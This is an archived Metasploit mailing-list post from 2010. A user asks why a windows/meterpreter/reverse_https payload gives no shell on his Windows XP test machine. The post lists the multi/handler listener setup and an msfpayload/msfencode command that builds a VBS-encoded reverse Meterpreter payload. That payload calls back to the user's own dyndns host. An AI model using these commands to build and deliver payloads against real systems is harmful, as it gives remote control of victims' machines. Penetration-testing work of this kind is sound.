Metasploit mailing list archives

windows/meterpreter/reverse_https [Broken?]


From: ricky-lee birtles <mr.r.birtles () gmail com>
Date: Wed, 19 May 2010 00:03:19 +0100

Hi,

Is [] broken for anyone else?

Here is how things are set up.

on my box I use -r to load the following file contents.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 8081
set LHOST [dyndns-host]
set ExitOnSession false
exploit -j

I create a standalone payload using the following commands:

./msfpayload windows/meterpreter/reverse_https LHOST=[dyndns-host]
LPORT=8081 R |
./msfencode -t loop-vbs -o final.vbs

and use smb to transfer it across to my test host [windows xp]

When the vbs file is run I receive no shell.

After looking at traffic with wireshark I can see a dns call to find
the destination host,
then traffic that should be for port 8081 but there is no content to
the traffic when you
look closer at the stream.

I have used http://www.canyouseeme.org/ to check the port is
accessable as well as made
sure the router is forwarding the port my way.

[Note. I could be missing something simple because I am a bit tired]

Regards,
-- Mr R Birtles
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: